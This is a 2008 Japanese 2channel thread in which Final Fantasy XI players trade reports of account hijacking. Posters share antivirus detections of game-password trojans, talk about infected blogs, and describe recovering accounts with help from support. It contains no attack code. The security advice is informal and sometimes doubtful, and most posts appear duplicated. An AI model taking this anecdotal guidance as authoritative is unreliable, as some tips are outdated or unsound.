その他のサイトはほとんどスレに貼られたアドレスから飛んでいました。
P2Pというとウィンニーやシェアでしょうか?
友人に勧められてインストールしましたが、設定がわからないので使った事はありません。
102 :既にその名前は使われています:2008/03/24(月) 08:48:02.79 ID:60BI5hP8
検知しました: ウイルス Net-Worm.Win32.Allaple.a ファイル: D:\etc\Rep\2007年\9月\FFXI 2007年09月27日18:43.htm
これやばい?
これやばい?
103 :既にその名前は使われています:2008/03/24(月) 08:53:04.68 ID:HWQPHJQs
これやばいこれやばい聞く前にウィルス名でぐぐって見ろと
104 :既にその名前は使われています:2008/03/24(月) 08:57:00.76 ID:60BI5hP8
ググったけど件数少なすぎてわからないんです・・・
誤検知なのかな?
誤検知なのかな?
105 :既にその名前は使われています:2008/03/24(月) 08:58:10.98 ID:cSZUGl4j
つーかヤバくないって言われたらどうすんだよw
飼ったままにしとくのか?
飼ったままにしとくのか?
106 :既にその名前は使われています:2008/03/24(月) 08:59:38.43 ID:60BI5hP8
誤検知なんだったら処理しない?を選ぼうかと・・
107 :既にその名前は使われています:2008/03/24(月) 09:02:28.57 ID:rCHR+RwE
>>99
忘れてましたorz夜はありがとうございました<(_ _)>
いまは大分落ち着いています。ホント頭が真っ白になりました。
2ちゃんねるのみなさんには色々お手数をかけてしまって、本当にありがとうございます!
今、体験版をダウンロードしてインストールしてます。
追加報告ですが、公式サイトのPOL会員情報にはログインできるようになりました。
ゲームのほうは試してませんが、ログインはちょっと様子を見たほうが良いですか?
忘れてましたorz夜はありがとうございました<(_ _)>
いまは大分落ち着いています。ホント頭が真っ白になりました。
2ちゃんねるのみなさんには色々お手数をかけてしまって、本当にありがとうございます!
今、体験版をダウンロードしてインストールしてます。
追加報告ですが、公式サイトのPOL会員情報にはログインできるようになりました。
ゲームのほうは試してませんが、ログインはちょっと様子を見たほうが良いですか?
108 :既にその名前は使われています:2008/03/24(月) 09:05:33.12 ID:HWQPHJQs
109 :既にその名前は使われています:2008/03/24(月) 09:07:23.92 ID:HWQPHJQs
おっと途中で送信
Allaple.aでぐぐって15300件も出てきました
どうやってぐぐったんだ?w
Allaple.aでぐぐって15300件も出てきました
どうやってぐぐったんだ?w
110 :既にその名前は使われています:2008/03/24(月) 09:13:32.82 ID:Q/ktx4QO
111 :既にその名前は使われています:2008/03/24(月) 09:14:18.71 ID:60BI5hP8
net-Worm.Win32.Allaple.a
でぐぐってました
でぐぐってました
112 :既にその名前は使われています:2008/03/24(月) 09:14:51.88 ID:RKvWaEx6
危険といわれているブログには行った覚えがないものの
一連の騒ぎで不安になり、一応カスペルスキーでスキャンしてみたらこんなのが出てきました。
C:\Documents and Settings\Application Data\Symantec\Norton AntiVirus\Quarantine\294E6D1E.jpg 感染: Trojan.VBS.IFrame
しかしノートンでスキャンしてもなんの反応もないし、そもそもノートンのプログラムの一部に思えるのですが
これはなんらかの対策をしたほうがいいんでしょうか?
一連の騒ぎで不安になり、一応カスペルスキーでスキャンしてみたらこんなのが出てきました。
C:\Documents and Settings\Application Data\Symantec\Norton AntiVirus\Quarantine\294E6D1E.jpg 感染: Trojan.VBS.IFrame
しかしノートンでスキャンしてもなんの反応もないし、そもそもノートンのプログラムの一部に思えるのですが
これはなんらかの対策をしたほうがいいんでしょうか?
113 :80:2008/03/24(月) 09:15:15.72 ID:QCo+vR7/
まさに>>96さんの言うようにログインしていました。
キャッシュやオートコンプリートなど全て削除してみましたが
ここからならブログIDでログインできてしまうんですね。
うちはマイナーブログですがこのままFC2を使い続けるのは不安が残ります…。
やはりブログは閉鎖して、しばらく様子を見ようと思います。
キャッシュやオートコンプリートなど全て削除してみましたが
ここからならブログIDでログインできてしまうんですね。
うちはマイナーブログですがこのままFC2を使い続けるのは不安が残ります…。
やはりブログは閉鎖して、しばらく様子を見ようと思います。
114 :既にその名前は使われています:2008/03/24(月) 09:15:35.01 ID:QuC4Hos4
>>112
ちょっと上のレスぐらい見ろ
ちょっと上のレスぐらい見ろ
115 :既にその名前は使われています:2008/03/24(月) 09:20:08.13 ID:rpE40Jdl
>>107
おはようございます。PCはクリーンになるまでそれでインしない方がいいと思います
このスレでも、2度ハックされたって方もいましたし。
PG2はhttp://miku.a.orn.jp/miku6/index.htmlでわかりやすく説明してくれてるので、
よかったら参考に。上のアドレス踏むの怖かったら、アグサで調べてからとかでも><
おはようございます。PCはクリーンになるまでそれでインしない方がいいと思います
このスレでも、2度ハックされたって方もいましたし。
PG2はhttp://miku.a.orn.jp/miku6/index.htmlでわかりやすく説明してくれてるので、
よかったら参考に。上のアドレス踏むの怖かったら、アグサで調べてからとかでも><
116 :既にその名前は使われています:2008/03/24(月) 09:23:57.04 ID:lzZx8A86
117 :既にその名前は使われています:2008/03/24(月) 09:27:13.76 ID:Q/ktx4QO
>>107
「公式サイト」が何を意味するか分からないが、
PlayOnLineにログインできたってことかな?
で、PlayOnLineにログインできたのなら、
ログインできた日時とID/pwをメモしておいて。
まずは、PCの面倒よりも自分のアカウントの状況を
□eに認識してもらうのを最優先しすべく、
>>7-9の準備しておこう。
繰り返すが、PCは常時接続にせず、必要最小限のときに接続すること。
PCを落としておくということでもかまわん。
「公式サイト」が何を意味するか分からないが、
PlayOnLineにログインできたってことかな?
で、PlayOnLineにログインできたのなら、
ログインできた日時とID/pwをメモしておいて。
まずは、PCの面倒よりも自分のアカウントの状況を
□eに認識してもらうのを最優先しすべく、
>>7-9の準備しておこう。
繰り返すが、PCは常時接続にせず、必要最小限のときに接続すること。
PCを落としておくということでもかまわん。
118 :既にその名前は使われています:2008/03/24(月) 09:28:41.97 ID:rCHR+RwE
>>115
わかりました。しばらく様子を見てみます<(_ _)>ありがとうございます!
サイトのほうも見て来ました。簡単なようですので入れられるようなら入れてみます。
関係ないですが、このカスペルキーの検知した時の音が怖いですorz
わかりました。しばらく様子を見てみます<(_ _)>ありがとうございます!
サイトのほうも見て来ました。簡単なようですので入れられるようなら入れてみます。
関係ないですが、このカスペルキーの検知した時の音が怖いですorz
119 :既にその名前は使われています:2008/03/24(月) 09:30:24.35 ID:HZjEcLif
いやちょっと待て
垢ハックされて昨日の夜はログインできなくて今日出来るっておかしくね?
サポセンまだ開いてないぞ
ただのパスワード入力ミスじゃ…
垢ハックされて昨日の夜はログインできなくて今日出来るっておかしくね?
サポセンまだ開いてないぞ
ただのパスワード入力ミスじゃ…
120 :既にその名前は使われています:2008/03/24(月) 09:31:10.08 ID:rCHR+RwE
121 :既にその名前は使われています:2008/03/24(月) 09:33:59.95 ID:Q/ktx4QO
122 :既にその名前は使われています:2008/03/24(月) 09:35:56.39 ID:lzZx8A86
>>119
それか、業者がパスを元に戻したとかかね
それか、業者がパスを元に戻したとかかね
123 :既にその名前は使われています:2008/03/24(月) 09:36:11.19 ID:rCHR+RwE
これが落ち着くまでの最後の書き込みです。
>>119
会員情報で自分が操作した履歴を見れるんですが
機能私が変更したのは一回だけですが↓のような結果が…orz
サービス利用履歴の確認 > プレイオンライン
年月日 サービス名 アクション
2008/03/24 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/03 プレイオンライン
POLパスワード 変更
>>119
会員情報で自分が操作した履歴を見れるんですが
機能私が変更したのは一回だけですが↓のような結果が…orz
サービス利用履歴の確認 > プレイオンライン
年月日 サービス名 アクション
2008/03/24 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/03 プレイオンライン
POLパスワード 変更
124 :既にその名前は使われています:2008/03/24(月) 09:37:09.52 ID:rpE40Jdl
ううん、何でPOL入れたのかな。バハスレで新しいレジコメールに送ったってあったから、それ使ったのかな?
プレイ中に落とされたって書いてたから、パスワード入力ミスって事はないんじゃないかな
プレイ中に落とされたって書いてたから、パスワード入力ミスって事はないんじゃないかな
125 :既にその名前は使われています:2008/03/24(月) 09:37:42.70 ID:rpE40Jdl
ごめん、かぶったorz
126 :既にその名前は使われています:2008/03/24(月) 09:39:22.55 ID:h5QlJmlh
>>119
ログインしてる最中に後から同じIDでログインされると先にログインしてる方は落とされるんだよ。
ID、パスの間違いじゃない。
その後、ログイン合戦があってパス変更されてしまい、ログイン出来なくなったらしい。
ログインしてる最中に後から同じIDでログインされると先にログインしてる方は落とされるんだよ。
ID、パスの間違いじゃない。
その後、ログイン合戦があってパス変更されてしまい、ログイン出来なくなったらしい。
127 :既にその名前は使われています:2008/03/24(月) 09:39:27.24 ID:Q/ktx4QO
>>119
それなら、ヴァナのことは放って、PCの始末に専念できるってことさ。
今は、アカウントの保持だよ。
感染してる=ハックされてると仮定してたが、PCが感染により重くて
POLとの通信が切れたこともあり得るね。
>>120
>>119の可能性もあるので、前回落とされた時間とさっきログインできた時間を
サポセンに連絡して、その間のログインがあったかの調査を頼んでおきなはれ。
それなら、ヴァナのことは放って、PCの始末に専念できるってことさ。
今は、アカウントの保持だよ。
感染してる=ハックされてると仮定してたが、PCが感染により重くて
POLとの通信が切れたこともあり得るね。
>>120
>>119の可能性もあるので、前回落とされた時間とさっきログインできた時間を
サポセンに連絡して、その間のログインがあったかの調査を頼んでおきなはれ。
128 :既にその名前は使われています:2008/03/24(月) 09:40:01.67 ID:CHzqP0my
>>123
これは怖い
これは怖い
129 :既にその名前は使われています:2008/03/24(月) 09:42:22.93 ID:wiMjf6Lx
>>110
ありがとうございます、恩にきます
ありがとうございます、恩にきます
130 :既にその名前は使われています:2008/03/24(月) 09:43:46.33 ID:rpE40Jdl
なんでこんなに書き換えられて?本人が書き換えたのが今日ではまだないですよね?
業者側が何度もかえてたんだろうけど・・・どうしてだろう?
業者側が何度もかえてたんだろうけど・・・どうしてだろう?
131 :既にその名前は使われています:2008/03/24(月) 09:46:36.60 ID:Q/ktx4QO
>>123
よく気が回ったね。いい情報拾った。
2回目以降の状況がどう見ても異常だというのが読み取れる。
それぞれのパスワード変更のときの接続元IPが違うだろうから、
それも申し入れておくといい。
で、業者側が痕跡を残さないように元に戻したとも考えられるか。
# アイテムがなくなってるか、変なところにいるはずなのでバレバレだがね。
ま、この辺は業者しか分からない訳なので、こういう例があると記憶しておこうや。
よく気が回ったね。いい情報拾った。
2回目以降の状況がどう見ても異常だというのが読み取れる。
それぞれのパスワード変更のときの接続元IPが違うだろうから、
それも申し入れておくといい。
で、業者側が痕跡を残さないように元に戻したとも考えられるか。
# アイテムがなくなってるか、変なところにいるはずなのでバレバレだがね。
ま、この辺は業者しか分からない訳なので、こういう例があると記憶しておこうや。
132 :既にその名前は使われています:2008/03/24(月) 09:53:17.18 ID:h9kMfdX+
133 :既にその名前は使われています:2008/03/24(月) 09:57:38.66 ID:h9kMfdX+
あぁ、ごめん勘違いしてた(´・ω・`)
134 :既にその名前は使われています:2008/03/24(月) 10:10:57.98 ID:Q/ktx4QO
>>123
3時過ぎに鯖板に晒してたメアドに昨日のIDをタイトルにしたメールしてあるからなっと。
3時過ぎに鯖板に晒してたメアドに昨日のIDをタイトルにしたメールしてあるからなっと。
135 :既にその名前は使われています:2008/03/24(月) 10:20:14.40 ID:xnmW2Y33
こんなスレあったんですね。
少し前にPCが重いので、@niftyの無料ウィルスチェックしたら
Trojanなんたら、種別:トロイの木馬 というのが検出できました。
ウィルスの駆除ボタンを押しても駆除失敗と出るだけなので、
強引にそのファイルごと全消去しました…。
POLは電話してパスワード変更してもらって(←今までのパスワード忘れてしまってた)、
その後何度かウィルスチェック(@niftyのとこですが…)をかけてますが
検出されてません。
でもここ見ると、カスペルスキイというのでしか検出できないみたいですね。
ウィルスが消えてるのか、それとも単に検出できないだけなのか…
少し前にPCが重いので、@niftyの無料ウィルスチェックしたら
Trojanなんたら、種別:トロイの木馬 というのが検出できました。
ウィルスの駆除ボタンを押しても駆除失敗と出るだけなので、
強引にそのファイルごと全消去しました…。
POLは電話してパスワード変更してもらって(←今までのパスワード忘れてしまってた)、
その後何度かウィルスチェック(@niftyのとこですが…)をかけてますが
検出されてません。
でもここ見ると、カスペルスキイというのでしか検出できないみたいですね。
ウィルスが消えてるのか、それとも単に検出できないだけなのか…
136 :既にその名前は使われています:2008/03/24(月) 10:25:49.35 ID:xXZ5UG8T
個人的メモ
@niftyウイルスチェックサービス:@nifty(カスペルスキーと同じエンジンらしくてしかも駆除もしれくれるらしい)
http://www.nifty.com/security/vcheck/
Firefoxをこの際入れてしかも今まで2chブラウザを使ってなかった、bbs2chreaderというアドオンを入れてみよう
【韓国 中国】PeerGuardian 23【YBBを弾こう】
http://tmp7.2ch.net/test/read.cgi/download/1204341836/
lt;丶`∀´gt; PeerGuardian2 ★2 (`ハ´ )
http://pc11.2ch.net/test/read.cgi/sec/1129612402/
@niftyウイルスチェックサービス:@nifty(カスペルスキーと同じエンジンらしくてしかも駆除もしれくれるらしい)
http://www.nifty.com/security/vcheck/
Firefoxをこの際入れてしかも今まで2chブラウザを使ってなかった、bbs2chreaderというアドオンを入れてみよう
【韓国 中国】PeerGuardian 23【YBBを弾こう】
http://tmp7.2ch.net/test/read.cgi/download/1204341836/
lt;丶`∀´gt; PeerGuardian2 ★2 (`ハ´ )
http://pc11.2ch.net/test/read.cgi/sec/1129612402/
137 :既にその名前は使われています:2008/03/24(月) 10:48:24.12 ID:Q/ktx4QO
>>135
よく消せたねぇ...
よく消せたねぇ...
138 :既にその名前は使われています:2008/03/24(月) 10:48:34.53 ID:0fYn7lrn
ログインできたのならとりあえずアイテムなくなってるかだけでも確認したほうがいいんじゃない?
139 :既にその名前は使われています:2008/03/24(月) 10:49:25.93 ID:Yz0CGQZ+
パスワード変更したならログインしないほうがいい
140 :既にその名前は使われています:2008/03/24(月) 10:58:16.75 ID:cxfdIhE2
>>112
それノートンがすでに隔離したファイルだと思うが
ノートンの使い方の中で隔離ファイルの削除を探すんだ
>>114
上のレスってどれ?
同様の質問がfc2ブログを見に行ったらスレにあったがそっちのこと?
それノートンがすでに隔離したファイルだと思うが
ノートンの使い方の中で隔離ファイルの削除を探すんだ
>>114
上のレスってどれ?
同様の質問がfc2ブログを見に行ったらスレにあったがそっちのこと?
141 :既にその名前は使われています:2008/03/24(月) 11:07:19.86 ID:/brrgtmu
>>140
114じゃないが…
FC2ブログを見に行くと垢ハックされるぞ
http://live27.2ch.net/test/read.cgi/ogame/1206155257/
コッチのスレとゴッチャになってしまったんじゃないかな?
>>112に関してのレスは下記参照
http://live27.2ch.net/test/read.cgi/ogame/1206155257/542-544
114じゃないが…
FC2ブログを見に行くと垢ハックされるぞ
http://live27.2ch.net/test/read.cgi/ogame/1206155257/
コッチのスレとゴッチャになってしまったんじゃないかな?
>>112に関してのレスは下記参照
http://live27.2ch.net/test/read.cgi/ogame/1206155257/542-544
142 :既にその名前は使われています:2008/03/24(月) 11:08:29.60 ID:586YcECP
>>878
感染もなにも、「Ace Password Sniffer」はオンライン販売されているソフト
フリーのパケットキャプチャソフトにパスワード抜き出しツールを被せたもの
シマンテックはこれを「好ましからざるソフト」に分類した
カスペルスキーがWinnyやShareを「好ましからざるソフト」扱いするのと同じ
みんなが説明してくれているように、リピータハブを使っていてかつ業者と
同居していなければPS2やXBOXがやり取りするデータがPCに流れることはないよ
たとえ流れても、専用の解読ツールでも作らない限りパスは抜けない
前スレの886からするとPS2なら安全ということなの?
ハブみてみたらリピーターだったんだが家には業者らしき人間はいない。
感染もなにも、「Ace Password Sniffer」はオンライン販売されているソフト
フリーのパケットキャプチャソフトにパスワード抜き出しツールを被せたもの
シマンテックはこれを「好ましからざるソフト」に分類した
カスペルスキーがWinnyやShareを「好ましからざるソフト」扱いするのと同じ
みんなが説明してくれているように、リピータハブを使っていてかつ業者と
同居していなければPS2やXBOXがやり取りするデータがPCに流れることはないよ
たとえ流れても、専用の解読ツールでも作らない限りパスは抜けない
前スレの886からするとPS2なら安全ということなの?
ハブみてみたらリピーターだったんだが家には業者らしき人間はいない。
143 :既にその名前は使われています:2008/03/24(月) 11:11:17.81 ID:QdOH9ZPy
>>36
ブログ主が小遣い稼ぎで中華広告を埋めたという線もあるからな
ブログ主が小遣い稼ぎで中華広告を埋めたという線もあるからな
144 :まとめ”管理”人 ◆mj63/8nmCU :2008/03/24(月) 11:14:25.55 ID:6zivGh2w
過去ログの方のまとめ管理人です。コテワード忘れてしまったので変わります。すみません本人です。
今現在の過去ログは950〜以降が取りきれてないものが若干ありますがup完了しています。
>>79さんありがとうございます。ログ補完できました。
被害抜粋も再開していきますのでお待ち下さい。
あとサイトにも書きましたがinfoseekのメルアドが送受信不具合を起こしています。(知人からのメールで発覚)
今現在届いてるメールには返信は終わってますが返事がない方は
matome★ort.sakura.ne.jp
(ほしを@にかえてください)
お手数ですがこちらに再送よろしくおねがいします。
今現在の過去ログは950〜以降が取りきれてないものが若干ありますがup完了しています。
>>79さんありがとうございます。ログ補完できました。
被害抜粋も再開していきますのでお待ち下さい。
あとサイトにも書きましたがinfoseekのメルアドが送受信不具合を起こしています。(知人からのメールで発覚)
今現在届いてるメールには返信は終わってますが返事がない方は
matome★ort.sakura.ne.jp
(ほしを@にかえてください)
お手数ですがこちらに再送よろしくおねがいします。
145 :ログまとめ ◆mj63/8nmCU :2008/03/24(月) 11:29:52.41 ID:6zivGh2w
うわ・・・名前に管理と入れると自動に””が付くんですね。
他の管理の方と紛らわしいので変えました。スレ汚しすみません
他の管理の方と紛らわしいので変えました。スレ汚しすみません
146 :既にその名前は使われています:2008/03/24(月) 11:46:43.59 ID:E6d3p/DA
Lirisです。先ほどサポートセンターへ連絡してきました。
ログインの履歴から、私が寝た後にログインされていて、不正アクセスの可能性が高いという事です。
一度、サポートセンターからもらったパスワードでPOLとFF11へログインしキャラクターの状態を確認。
なくなってるアイテムもなく、お金もそのままでした。
おそらく私が書き込んだあとにGMを呼んで下さった方々のおかげだと思います。
倉庫の方も無事を確認しました。キャラクターの移動もなく、ホントそのままの状態です。
ログアウトしたあと、また新しいパスワードをもらいましたので、
パソコンの方が綺麗になってからログインしようかと思います。
サポートセンターの方からウィルスの情報がありましたら教えてください、という事で
・重要な領域
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj
を報告して来ました。
ログインの履歴から、私が寝た後にログインされていて、不正アクセスの可能性が高いという事です。
一度、サポートセンターからもらったパスワードでPOLとFF11へログインしキャラクターの状態を確認。
なくなってるアイテムもなく、お金もそのままでした。
おそらく私が書き込んだあとにGMを呼んで下さった方々のおかげだと思います。
倉庫の方も無事を確認しました。キャラクターの移動もなく、ホントそのままの状態です。
ログアウトしたあと、また新しいパスワードをもらいましたので、
パソコンの方が綺麗になってからログインしようかと思います。
サポートセンターの方からウィルスの情報がありましたら教えてください、という事で
・重要な領域
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj
を報告して来ました。
147 :既にその名前は使われています:2008/03/24(月) 11:48:27.80 ID:E6d3p/DA
実際に被害(キャラ・アイテム等)にないと言うことですが、
不正にアクセスされたという結果は犯罪なので、
警察の生活安全課に、ご自身の判断で通報・被害届けを出してください、とのことです。
ここでたくさんの応援と助言をありがとうございました<(_ _)>
たぶん、みなさんがいなければ泣き寝入りしていたかもしれません。
私のような結果は、もしかすると稀なのかもしれませんが、
キャラクターがいなくなったり、アイテムがなくなったりする人が実際にいるんですよね…
こういう被害者が出ないように祈っています。
私だけではどうしようも出来なかった事だと思っていますので感謝しきれません。
本当にありがとうございました!<(_ _)>
不正にアクセスされたという結果は犯罪なので、
警察の生活安全課に、ご自身の判断で通報・被害届けを出してください、とのことです。
ここでたくさんの応援と助言をありがとうございました<(_ _)>
たぶん、みなさんがいなければ泣き寝入りしていたかもしれません。
私のような結果は、もしかすると稀なのかもしれませんが、
キャラクターがいなくなったり、アイテムがなくなったりする人が実際にいるんですよね…
こういう被害者が出ないように祈っています。
私だけではどうしようも出来なかった事だと思っていますので感謝しきれません。
本当にありがとうございました!<(_ _)>
148 :既にその名前は使われています:2008/03/24(月) 11:55:41.59 ID:lsU5BPJR
>>146
被害が無くて本当に良かった。
でもハックしてログインしておきながらギルに手をつけないってなんなんだろう?
あえて取るほどでもない金額とかだと被害に合わないのかな?
参考までに所持金額が知りたいです。失礼な質問でごめん(´・ω・`)
被害が無くて本当に良かった。
でもハックしてログインしておきながらギルに手をつけないってなんなんだろう?
あえて取るほどでもない金額とかだと被害に合わないのかな?
参考までに所持金額が知りたいです。失礼な質問でごめん(´・ω・`)
149 :既にその名前は使われています:2008/03/24(月) 11:57:33.35 ID:E6d3p/DA
150 :既にその名前は使われています:2008/03/24(月) 12:00:06.03 ID:37tZuH3A
そこまでやられてると、必要なユーザーデータをバックアップ後
初期化ー>パッチ適応ー>再インストールしたほうがいいかも
ブックマークとか忘れがちだけどね
年賀状ソフトのデータとかも忘れて入れなおしたなぁ〜今年
初期化ー>パッチ適応ー>再インストールしたほうがいいかも
ブックマークとか忘れがちだけどね
年賀状ソフトのデータとかも忘れて入れなおしたなぁ〜今年
151 :既にその名前は使われています:2008/03/24(月) 12:06:10.84 ID:V0clbcIb
152 :既にその名前は使われています:2008/03/24(月) 12:09:42.70 ID:xXZ5UG8T
153 :既にその名前は使われています:2008/03/24(月) 12:12:04.46 ID:lsU5BPJR
154 :既にその名前は使われています:2008/03/24(月) 12:17:08.53 ID:2iutMXe5
素人なもんで教えてください
ブログが危ないのはわかったが、ELEMENとかは大丈夫なんだろか
(o・v・o)?
ブログが危ないのはわかったが、ELEMENとかは大丈夫なんだろか
(o・v・o)?
155 :既にその名前は使われています:2008/03/24(月) 12:17:20.29 ID:E6d3p/DA
>>151
そうなのかもしれませんね…
あとは素早くたくさんの人が対処してくださった結果のだと思います。
>>152
カスペルスキー オンラインスキャナ レポート
2008年3月24日 1:20:33
OS: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
カスペルスキー オンラインスキャナ バージョン: 5.0.98.0
データベースの最終アップデート: 23/03/2008
データベースのレコード: 655233
↑これがスキャンした時のです。
今は体験版で削除をしてますが、>>150さんの助言どおり終わったら再インストールするつもりです。
やっと安心できますorzホント気が気じゃなかったです。
みなさんのレスがなかったら一人で悶々としてるしかなかったですよ…
何かありましたらまた報告しますね。
お礼ばっかり言ってる気がしますが、言わせてください<(_ _)>
色々とありがとうございました!
そうなのかもしれませんね…
あとは素早くたくさんの人が対処してくださった結果のだと思います。
>>152
カスペルスキー オンラインスキャナ レポート
2008年3月24日 1:20:33
OS: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
カスペルスキー オンラインスキャナ バージョン: 5.0.98.0
データベースの最終アップデート: 23/03/2008
データベースのレコード: 655233
↑これがスキャンした時のです。
今は体験版で削除をしてますが、>>150さんの助言どおり終わったら再インストールするつもりです。
やっと安心できますorzホント気が気じゃなかったです。
みなさんのレスがなかったら一人で悶々としてるしかなかったですよ…
何かありましたらまた報告しますね。
お礼ばっかり言ってる気がしますが、言わせてください<(_ _)>
色々とありがとうございました!
156 :既にその名前は使われています:2008/03/24(月) 12:21:35.09 ID:5JqdShUs
157 :既にその名前は使われています:2008/03/24(月) 12:29:12.48 ID:KjMFND3D
158 :既にその名前は使われています:2008/03/24(月) 12:34:14.42 ID:DC8kpJkf
新たに福建中華の罠ドメインが登録されていたので気をつけてくれよな!
ブログ改竄騒ぎよろしく早ければすでに使われているはず。
Domain name: gamelaone■com
longyan Fujian 364000
Created: 2008-03-22
ブログ改竄騒ぎよろしく早ければすでに使われているはず。
Domain name: gamelaone■com
longyan Fujian 364000
Created: 2008-03-22
159 :既にその名前は使われています:2008/03/24(月) 12:36:47.46 ID:cSZUGl4j
ガメレオン涙目じゃね?
160 :既にその名前は使われています:2008/03/24(月) 12:39:21.34 ID:rwIEyNv5
フォルダ構成理解してない奴ばっかだな
こんなバカだらけだと垢ハックは減らないわ
こんなバカだらけだと垢ハックは減らないわ
161 :既にその名前は使われています:2008/03/24(月) 12:39:47.32 ID:vQXYTLxz
パッケ買ってせこせこと複数PC上でツール使いながら活動するよか楽に金が稼げる
手段としてやってるんだろね。
手段としてやってるんだろね。
162 :既にその名前は使われています:2008/03/24(月) 12:42:05.87 ID:DZlVuT/f
>>146じゃないけど、二、三日前にハックにあって何も被害無し。対応の仕方も同じ。ウィルスが原因。
俺の場合、inしてる時に他からログインされて、相手とログイン合戦になった結果パス変えられてって感じ。
手持ちの他垢からGMに伝えたけど電話じゃなきゃ無理だった。
知らない誰かと自キャラでログイン合戦してる恐怖感はトラウマだわ。 長文チラ裏スマソ
俺の場合、inしてる時に他からログインされて、相手とログイン合戦になった結果パス変えられてって感じ。
手持ちの他垢からGMに伝えたけど電話じゃなきゃ無理だった。
知らない誰かと自キャラでログイン合戦してる恐怖感はトラウマだわ。 長文チラ裏スマソ
163 :既にその名前は使われています:2008/03/24(月) 12:42:30.25 ID:cSZUGl4j
単発で急に切れる奴何なの?w
164 :既にその名前は使われています:2008/03/24(月) 12:42:51.55 ID:sV5MTkg6
とにかく■は公式の目立つところに垢ハクの注意勧告を載せるべきだな。
ネ実で対策が進んでるのに、まったくあきれるほど保身を優先する会社だぜ。
問題を認めると、問い合わせやら責任問題やらの対応に手がかかると思ってんだろうな。
■が無視してるそのあいだにも被害は拡大しているというのに。
ネ実で対策が進んでるのに、まったくあきれるほど保身を優先する会社だぜ。
問題を認めると、問い合わせやら責任問題やらの対応に手がかかると思ってんだろうな。
■が無視してるそのあいだにも被害は拡大しているというのに。
165 :既にその名前は使われています:2008/03/24(月) 12:43:21.80 ID:CpNX2ymN
ところで、オートログインのネットゲームって一般的な存在なんだろうか?
166 :既にその名前は使われています:2008/03/24(月) 12:46:49.68 ID:xXZ5UG8T
167 :既にその名前は使われています:2008/03/24(月) 12:53:18.90 ID:O+2gK/uP
ペコログ踏んじまった。
avastとSpybot無反応だ。。
カスペ落としてスキャンせねば><
avastとSpybot無反応だ。。
カスペ落としてスキャンせねば><
168 :既にその名前は使われています:2008/03/24(月) 12:58:43.37 ID:Q/ktx4QO
>>146
ヴァナ無事確認おめでとう! 本当によかった。
>>149
いわゆる高額保有者ではなく、異次元価格品もなかったので、
業者も困ったってとこかw
君はわしか?w
で、>>150のいうとおりだと思う。
何かしら住んでる可能性あるし、バックドア1度開けられて、IP拾われてるだろうから
業者さんからアタック掛けられる可能性も残る。
ので、ウィルス対策単体ではなく、一式面倒を見てくれるソフトを入れておくのを
お勧めする。
鍵は多重に掛けるでしょ?
>>156
最近は、MicrosoftUpdateがよいよ〜。
MS-Officeのも引っかけてくれるから。
ヴァナ無事確認おめでとう! 本当によかった。
>>149
いわゆる高額保有者ではなく、異次元価格品もなかったので、
業者も困ったってとこかw
君はわしか?w
で、>>150のいうとおりだと思う。
何かしら住んでる可能性あるし、バックドア1度開けられて、IP拾われてるだろうから
業者さんからアタック掛けられる可能性も残る。
ので、ウィルス対策単体ではなく、一式面倒を見てくれるソフトを入れておくのを
お勧めする。
鍵は多重に掛けるでしょ?
>>156
最近は、MicrosoftUpdateがよいよ〜。
MS-Officeのも引っかけてくれるから。
169 :既にその名前は使われています:2008/03/24(月) 13:03:27.16 ID:NX6Uk0kR
>>167
まだペコログにトロイ残ってるのかな?
まだペコログにトロイ残ってるのかな?
170 :既にその名前は使われています:2008/03/24(月) 13:05:26.80 ID:O+2gK/uP
171 :既にその名前は使われています:2008/03/24(月) 13:10:26.54 ID:NX6Uk0kR
>>170
前スレで警告されてたけど、
ぺころぐにトロイがあるってこちらが聞いたのは
金曜日の話なんだよね。
FC2ブログは今回の話見てから一切開いてないけど
金曜日から見てる人は注意したほうが良いかもしれない。
今も治ってるかどうかもわからないし。
また情報が入ったら書き込みします。
前スレで警告されてたけど、
ぺころぐにトロイがあるってこちらが聞いたのは
金曜日の話なんだよね。
FC2ブログは今回の話見てから一切開いてないけど
金曜日から見てる人は注意したほうが良いかもしれない。
今も治ってるかどうかもわからないし。
また情報が入ったら書き込みします。
172 :既にその名前は使われています:2008/03/24(月) 13:11:05.57 ID:13N6BdxD
スクエニはいつまで静観してるつもりだろうな…
被害が一気に増えたりでもしら悪い意味で有名になるだろうに…
被害が一気に増えたりでもしら悪い意味で有名になるだろうに…
173 :既にその名前は使われています:2008/03/24(月) 13:13:25.17 ID:zZKH+Aj5
つうかマンガ喫茶とかつかうほうがアホなんだろ
自宅だけにして、LSコミュニティも利用しないほうがいい
自宅だけにして、LSコミュニティも利用しないほうがいい
